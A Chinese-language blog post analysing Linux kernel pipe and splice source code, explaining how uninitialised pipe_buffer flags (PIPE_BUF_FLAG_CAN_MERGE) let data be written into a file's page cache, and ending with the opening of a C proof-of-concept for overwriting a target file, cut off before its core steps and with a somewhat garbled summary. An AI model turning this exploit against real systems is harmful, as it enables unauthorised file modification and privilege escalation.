这调用链 麻了
众所周知 在Linux中 近乎所有东西都是以文件
的形式存在的 管道也不例外 在Linux内核中 管道本质上是创建了一个虚拟的inode结点 在节点上存放数据的是pipe_inode_info
结构体
当创建一个管道时 内核会创建一个VFS inode 一个pipe_inode_info
结构体 两个文件描述符(表示管道的两端) 一个pipe_buffer
结构体数组
对于文件之间的copy 最直接的方法就是直接打开两个文件 然后对着copy就好了 当然一般直接的方法都比较烂.. 这样做虽然简单 但是会打来大量的系统开销 因为需要频繁的将数据从用户态传递到内核态 然后在将数据从内核态传递到用户态来回进行数据拷贝
因此为了减少这样的系统开销所以诞生了splice
其作用是在两个文件描述符之间进行copy 但是这个拷贝过程是不经过用户态的 其本质是利用管道在内核空间中进行数据拷贝
当数据想要从一个文件描述符拷贝到另一个文件描述符中时 只需要先创建一个管道 之后使用splice
将数据从源文件描述符拷贝到管道中 然后再调用splice
将数据从管道拷贝到目的文件操作符中即可 这样所有数据的拷贝都在内核空间完成
c// include/linux/pipe_fs_i.h
/*
pipe_buffer结构体存放着实际管道中存放的数据
*/
// flags
#define PIPE_DEF_BUFFERS 16
#define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */
#define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */
#define PIPE_BUF_FLAG_WHOLE 0x20 /* read() must return entire buffer or error */
#ifdef CONFIG_WATCH_QUEUE
#define PIPE_BUF_FLAG_LOSS 0x40 /* Message loss happened after this buffer */
#endif
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page; // 当前pipe_buffer所对应的page
unsigned int offset, len; // 数据在页中的偏移,长度
const struct pipe_buf_operations *ops; // 与该缓冲区相关联的操作 与本文无关
unsigned int flags; // flags
unsigned long private; // 属于关联操作的私有data
};
c// include/linux/pipe_fs_i.h
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex; // 信号量 保证互斥操作
wait_queue_head_t rd_wait, wr_wait; // 等待读取的队列 等待写入的队列 有点类似生产者问题 因为管道空而不能读 因为管道满而不能写
unsigned int head; // 管道的起始指针
unsigned int tail; // 管道的结束指针
unsigned int max_usage; // 最大可用pipe_buffer数量
unsigned int ring_size; // 当前已分配的pipe_buffer个数
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers; // 当前管道的读者数量
unsigned int writers; // 当前管道的写者数量
unsigned int files; //
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs; // 存放多个pipe_buffer的数组
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};
c// include/linux/uio.h
/*
iov_iter结构体用于迭代被分为多个页的数据 -> 用于迭代一个个页面
*/
enum iter_type {
/* iter types */
ITER_IOVEC = 4,
ITER_KVEC = 8,
ITER_BVEC = 16,
ITER_PIPE = 32, // 当前迭代的数据为某个pipe中的数据
ITER_DISCARD = 64, // 写入当前iov_iter的数据全部丢弃
};
struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type; // 当前迭代的数据来自于什么结构
size_t iov_offset; // 当前迭代到page的相对偏移 读写将从该page的这个相对偏移开始
size_t count; // 可读写数组字节大小
union {
const struct iovec *iov;
const struct kvec *kvec;
const struct bio_vec *bvec;
struct pipe_inode_info *pipe;
};
union {
unsigned long nr_segs;
struct {
unsigned int head;
unsigned int start_head;
};
};
};
创建管道使用的是pipe()系统调用 但是实际上在Kernel层面调用的是do_pipe2()
c// fs/pipe.c
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;
error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}
可以看到实际上调用的是__do_pipe_flags()
cstatic int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;
error = create_pipe_files(files, flags);
if (error)
return error;
error = get_unused_fd_flags(flags);
...
}
cint create_pipe_files(struct file **res, int flags)
{
struct inode *inode = get_pipe_inode();
struct file *f;
int error;
if (!inode)
return -ENFILE;
...
}
cstatic struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;
if (!inode)
goto fail_inode;
inode->i_ino = get_next_ino();
pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;
...
}
cstruct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
...
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}
...
}
可以看到最后先调用了kzalloc()
分配了一个pipe_inode_info
结构体 然后调用``kcalloc()分配了
PIPE_DEF_BUFFERS(16)个
pipe_buf 然后挂载到
pipe_inode_info -> bufs`上
至此 pipe的创建流程已经走完 调用链为pipe() -> do_pipe2() -> __do_pipe_flags() -> create_pipe_files() -> get_pipe_inode() -> alloc_pipe_info()
在同文件中有一个file_operations
函数表 可以看到对于pipe的读操作是调用pipe_read()
实现的
cconst struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
相关函数定义为
c// fs/pipe.c
static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)
其中两个参数
首先是调用iov_iter_count(to)
来获取读取的字节数 并且从iocb
中获取到pipe_inode_info
结构体 如果读取的字节数为0 则直接退出
csize_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;
/* Null read succeeds. */
if (unlikely(total_len == 0))
return 0;
ret = 0;
__pipe_lock(pipe);
然后判断管道是否已满 如果pipe->head - pipe->tail >= pipe->max_usage
则管道已满
cwas_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
接下来就是循环读 将pipe中的内容读到``to->pipe`中
cfor (;;) {
unsigned int head = pipe->head;
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;
if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t chars = buf->len;
size_t written;
int error;
if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}
error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;
/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}
if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
if (!pipe->writers)
break;
if (ret)
break;
if (filp->f_flags & O_NONBLOCK) {
ret = -EAGAIN;
break;
}
__pipe_unlock(pipe);
/*
* We only get here if we didn't actually read anything.
*
* However, we could have seen (and removed) a zero-sized
* pipe buffer, and might have made space in the buffers
* that way.
*
* You can't make zero-sized pipe buffers by doing an empty
* write (not even in packet mode), but they can happen if
* the writer gets an EFAULT when trying to fill a buffer
* that already got allocated and inserted in the buffer
* array.
*
* So we still need to wake up any pending writers in the
* _very_ unlikely case that the pipe was full, but we got
* no data.
*/
if (unlikely(was_full)) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
/*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;
__pipe_lock(pipe);
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
wake_next_reader = true;
}
最后做一些判断 然后返回读入字节数
cif (was_full) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
if (wake_next_reader)
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
if (ret > 0)
file_accessed(filp);
return ret;
还是先来看下函数定义
c// lib/iov_iter.c
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
整体函数实现非常短 根据不同的iov_iter类型 执行不同的copy方式 这里我们主要关注的是pipe的copy方式
c if (unlikely(!page_copy_sane(page, offset, bytes)))
return 0;
if (i->type & (ITER_BVEC|ITER_KVEC)) {
void *kaddr = kmap_atomic(page);
size_t wanted = copy_to_iter(kaddr + offset, bytes, i);
kunmap_atomic(kaddr);
return wanted;
} else if (unlikely(iov_iter_is_discard(i)))
return bytes;
else if (likely(!iov_iter_is_pipe(i)))
return copy_page_to_iter_iovec(page, offset, bytes, i);
else
return copy_page_to_iter_pipe(page, offset, bytes, i);
整体实现也很短而且好理解
cstatic size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体
struct pipe_buffer *buf;
// 获取相关的pipe描述相关数据
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;
if (unlikely(bytes > i->count)) // 如果读取的字节数大于pipe最大数据量
bytes = i->count;
if (unlikely(!bytes))
return 0;
if (!sanity(i))
return 0;
off = i->iov_offset; // 待写入的偏移
buf = &pipe->bufs[i_head & p_mask]; // 获取pipe中的buf
if (off) {
if (offset == off && buf->page == page) { // 如果读取和写入的是同一页 同一位置
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage)) // pipe满则直接返回
return 0;
buf->ops = &page_cache_pipe_buf_ops;
get_page(page); // 增加该页的refcount
buf->page = page; // 直接引用该页
buf->offset = offset;
buf->len = bytes;
pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}
很显然 对于接收方来说 复制就是直接引用
需要复制的页面 并且记录页面的offset len等数据 这样做的好处是降低了性能开销 毕竟io是需要时间的 但是赋值近乎不需要
当然因为这里接收方式直接引用的其他页面 所以必须保证在写入的时候不会将数据写入到这种页面中 另外我们可以发现在page复制到pipe_buffer
中时 几乎所有的pipe相关的数据都被重新赋值了 除了flags
对于pipe的数据传递 除了pipe_read() -> copy_page_to_iter() -> copy_page_to_iter_pipe()
的调用链之外 copy_to_iter()
也可以实现类似的功能
c// include/linux/uio.h
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
if (unlikely(!check_copy_size(addr, bytes, true)))
return 0;
else
return _copy_to_iter(addr, bytes, i);
}
c// lib/iov_iter.c
/*
addr: 源地址
bytes: 复制字节数
i: iov_iter指针
*/
size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
const char *from = addr;
if (unlikely(iov_iter_is_pipe(i)))
return copy_pipe_to_iter(addr, bytes, i);
if (iter_is_iovec(i))
might_fault();
iterate_and_advance(i, bytes, v,
copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),
memcpy_to_page(v.bv_page, v.bv_offset,
(from += v.bv_len) - v.bv_len, v.bv_len),
memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)
)
return bytes;
}
当然 可以发现最后针对pipe类型还是调用的copy_pipe_to_iter()
所以针对pipe的数据传递还有一条调用链为copy_to_iter() -> _copy_to_iter() -> copy_pipe_to_iter()
c// lib/iov_iter.c
static size_t copy_pipe_to_iter(const void *addr, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head;
size_t n, off;
if (!sanity(i))
return 0;
// 下文详解
bytes = n = push_pipe(i, bytes, &i_head, &off);
if (unlikely(!n))
return 0;
do {
size_t chunk = min_t(size_t, n, PAGE_SIZE - off);
memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk); // 直接copy
i->head = i_head;
i->iov_offset = off + chunk;
n -= chunk;
addr += chunk;
off = 0;
i_head++;
} while (n);
i->count -= bytes; // 修改当前iov_iter待写入的大小
return bytes;
}
c// lib/iov_iter.c
static size_t push_pipe(struct iov_iter *i, size_t size,
int *iter_headp, size_t *offp)
{
struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int iter_head;
size_t off;
ssize_t left;
// check
if (unlikely(size > i->count))
size = i->count;
if (unlikely(!size))
return 0;
left = size;
data_start(i, &iter_head, &off); // 获取pipe的head和起始offset
*iter_headp = iter_head;
*offp = off;
// 如果是从页面中间的位置开始写
if (off) {
left -= PAGE_SIZE - off; // left - (PAGE_SIZE - off) 判断剩余位置是否够写
if (left <= 0) {
pipe->bufs[iter_head & p_mask].len += size; // 如果够写就返回
return size;
}
pipe->bufs[iter_head & p_mask].len = PAGE_SIZE; // 如果不够就扩充到PAGE_SIZE
iter_head++;
}
// 循环扩充pipe_buffer
while (!pipe_full(iter_head, p_tail, pipe->max_usage)) {
struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask]; // 获取pipe_buffer
struct page *page = alloc_page(GFP_USER);
if (!page)
break;
// 对于pipe_buffer的属性进行初始化
buf->ops = &default_pipe_buf_ops;
buf->page = page;
buf->offset = 0;
buf->len = min_t(ssize_t, left, PAGE_SIZE);
left -= buf->len;
iter_head++;
pipe->head = iter_head;
if (left == 0)
return size;
}
return size - left;
}
注意 此处当Kernel循环扩充pipe_buffer时跟copy_page_to_iter_pipe()
一样 漏掉了pipe_buffer
的flag
字段
根据pipefifo_fops
得知 对于管道的写操作是调用pipe_write
实现的
cconst struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
c// fs/pipe.c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;
__pipe_lock(pipe);
// 如果pipe没有读者则返回
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif
/*
* 只有当管道开始变空时才唤醒writers 因为除此之外的情况只有没有读者在等待
* 如果其不为空 则我们尝试将新数据合并到最后一个buffer中
* 这自然合并了小的数据写入 并且也会对跨越多个page的大数据写入实现页面对齐
*
* 说人话: 优先写入未满的页面 除非未满页面不允许写入再开新页面
*/
head = pipe->head; // 获取队列头
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
// 如果pipe_buffer非空且pipe_buffer没有写满
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; // 获取上一个pipe_buffer
int offset = buf->offset + buf->len;
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && // 如果上个pipe_buffer设置了PIPE_BUF_FLAG_CAN_MERGE标志位且写完大小小于等于PAGE_SIZE 则直接写入
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
// 剩余数据写入
for (;;) {
if (!pipe->readers) { // 没有读者直接返回
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) { // 如果管道没满 正常写入
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;
if (!page) { // 如果没有准备tmp_page则分配
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
/*
* 提前在环中分配一个 slot,并附加一个空 buffer。
* 若我们出错或未能使用它,它会被读者所使用,
*/
spin_lock_irq(&pipe->rd_wait.lock);
head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) { // 管道满 开启下一次循环
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}
pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);
/* 将其插入buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp)) // 设置pipe_buffer的flag 如果pipe_inode_info的f_flags设置了O_DIRECT 则flag设置为PIPE_BUF_FLAG_PACKET
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); // 将数据copy到对应页面上
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;
if (!iov_iter_count(from)) // 判断是否结束
break;
}
if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;
// 等待buffer空间可用
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
// 锁相关操作
__pipe_unlock(pipe);
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
__pipe_lock(pipe);
was_empty = pipe_empty(pipe->head, pipe->tail);
wake_next_writer = true;
}
out:
if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
wake_next_writer = false;
__pipe_unlock(pipe);
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
if (wake_next_writer)
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
int err = file_update_time(filp);
if (err)
ret = err;
sb_end_write(file_inode(filp)->i_sb);
}
return ret;
}
跟pipe()
差不多 虽然在常规状态下调用splice使用的是splice()
系统调用 但是其背后实现是内核中的do_splice()
c#include <fcntl.h>
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
这里会进行分辨 是pipe2pipe拷贝
pipe2file拷贝
还是file2pipe拷贝
或者是file2file拷贝
然后流入不同的函数 这里我们重点关注file2pipe
c// fs/splice.c
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;
// 读写权限判断
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;
// 从file中获取到pipe_inode_info结构体
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
if (ipipe && opipe) { // pipe to pipe
...
return splice_pipe_to_pipe(ipipe, opipe, len, flags);
}
if (ipipe) { // pipe to file
...
ret = do_splice_from(ipipe, out, &offset, len, flags);
...
return ret;
}
if (opipe) { // file to pipe
// pipe和文件校验
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
pipe_lock(opipe);
// 等待pipe空位
ret = wait_for_space(opipe, flags);
if (!ret) {
unsigned int p_space;
// 获取传递数据大小
/* Don't try to read more the pipe has space for. */
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);
// 下文详解
ret = do_splice_to(in, &offset, opipe, len, flags);
}
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;
return ret;
}
return -EINVAL;
}
整体流程还是比较短 其实大部分都是在做数据校验 然后根据文件类型调用对应文件类型的函数调用表中的splice_read()
c// fs/splice.c
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
int ret;
if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;
ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;
if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}
这里以最常见的ext4文件类型举例 可以查询到对应的函数调用表 可以看到最后是调用了generic_file_splice_read()
c// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,
.write_iter = ext4_file_write_iter,
.iopoll = iomap_dio_iopoll,
.unlocked_ioctl = ext4_ioctl,
.mmap = ext4_file_mmap,
.mmap_supported_flags = MAP_SYNC,
.open = ext4_file_open,
.release = ext4_release_file,
.fsync = ext4_sync_file,
.get_unmapped_area = thp_get_unmapped_area,
.splice_read = generic_file_splice_read,
.splice_write = iter_file_splice_write,
.fallocate = ext4_fallocate,
};
可以看到该函数还是进行一些基础操作 创建结构体什么的 然后调用call_read_iter()
进行操作
c// fs/splice.c
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;
iov_iter_pipe(&to, READ, pipe, len); // 根据pipe创建iov_iter结构体
i_head = to.head;
init_sync_kiocb(&kiocb, in); // 创建kiocb结构体
kiocb.ki_pos = *ppos;
ret = call_read_iter(in, &kiocb, &to); // 下文详解
if (ret > 0) { // 正常传输
*ppos = kiocb.ki_pos;
file_accessed(in); // 更新状态
} else if (ret < 0) { // 传输失败
to.head = i_head;
to.iov_offset = 0;
iov_iter_advance(&to, 0); /* to free what was emitted */
/*
* callers of ->splice_read() expect -EAGAIN on
* "can't put anything in there", rather than -EFAULT.
*/
if (ret == -EFAULT)
ret = -EAGAIN;
}
return ret;
}
最后又是调用对应文件类型的read_iter
c// include/linux/fs.h
static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
struct iov_iter *iter)
{
return file->f_op->read_iter(kio, iter);
}
根据之前的函数调用表可以看到read_iter()
调用的是ext4_file_read_iter()
c// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,
.write_iter = ext4_file_write_iter,
.iopoll = iomap_dio_iopoll,
.unlocked_ioctl = ext4_ioctl,
.mmap = ext4_file_mmap,
.mmap_supported_flags = MAP_SYNC,
.open = ext4_file_open,
.release = ext4_release_file,
.fsync = ext4_sync_file,
.get_unmapped_area = thp_get_unmapped_area,
.splice_read = generic_file_splice_read,
.splice_write = iter_file_splice_write,
.fallocate = ext4_fallocate,
};
c// fs/ext4/file.c
static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);
if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;
if (!iov_iter_count(to))
return 0; /* skip atime */
if (iocb->ki_flags & IOCB_DIRECT)
return ext4_dio_read_iter(iocb, to);
// 没设置IOCB_DIRECT流入这里
return generic_file_read_iter(iocb, to);
}
c// mm/filemap.c
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
size_t count = iov_iter_count(iter);
ssize_t retval = 0;
...
retval = generic_file_buffered_read(iocb, iter, retval);
out:
return retval;
}
代码量太大了 简单讲下功能吧
cssize_t generic_file_buffered_read(struct kiocb *iocb,
struct iov_iter *iter, ssize_t written)
{
struct file *filp = iocb->ki_filp;
struct file_ra_state *ra = &filp->f_ra;
struct address_space *mapping = filp->f_mapping;
struct inode *inode = mapping->host;
struct page *pages_onstack[PAGEVEC_SIZE], **pages = NULL;
unsigned int nr_pages = min_t(unsigned int, 512,
((iocb->ki_pos + iter->count + PAGE_SIZE - 1) >> PAGE_SHIFT) -
(iocb->ki_pos >> PAGE_SHIFT));
int i, pg_nr, error = 0;
bool writably_mapped;
loff_t isize, end_offset;
if (unlikely(iocb->ki_pos >= inode->i_sb->s_maxbytes))
return 0;
if (unlikely(!iov_iter_count(iter)))
return 0;
...
copied = copy_page_to_iter(pages[i], offset, bytes, iter);
...
}
至此整体已经和之前pipe相关的函数链接上了
根据前面的分析基本上漏洞思路很明晰了
PIPE_BUF_FLAG_CAN_MERGE
PIPE_BUF_FLAG_CAN_MERGE
的原因 Kernel会将数据写入到文件缓存页中主要漏洞原因是未对pipe_buffer的标志位进行初始化造成的
POC如下
c#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <strings.h>
#include <sys/stat.h>
#include <sys/user.h>
void errExit(char *buf)
{
printf("[x] ERROR: %s", buf);
exit(EXIT_FAILURE);
}
int main(int argc, char **argv, char **envp)
{
size_t page_size;
size_t offset_infile;
int target_filefd;
struct stat target_filestat;
size_t data_length;
int pipe_fd[2];
int pipe_size;
char *buffer;
int retval;
if (argc < 4)
{
puts("[*] Usage: ./exp target_file offset_in_file data");
exit(EXIT_FAILURE);
}
page_size = sysconf(_SC_PAGESIZE);
offset_infile = strtoul(argv[2], NULL, 0);
if (offset_infile % page_size == 0)
{
errExit("Can't write on a whole page");
}
target_filefd = open(argv[1], O_WRONLY);
if (target_filefd < 0)
{
errExit("Open error");
}
if (fstat(target_filefd, &target_filestat) < 0)
{
errExit("fstat error");
}
data_length = strlen(argv[3]);
if (offset_infile + data_length > target_filestat.st_size)
{
errExit("Can't enlarge file");
}
if ((offset_infile % page_size + data_length) > page_size)
{
errExit("Can't write across pages");
}
puts("[*] Start exploiting..");
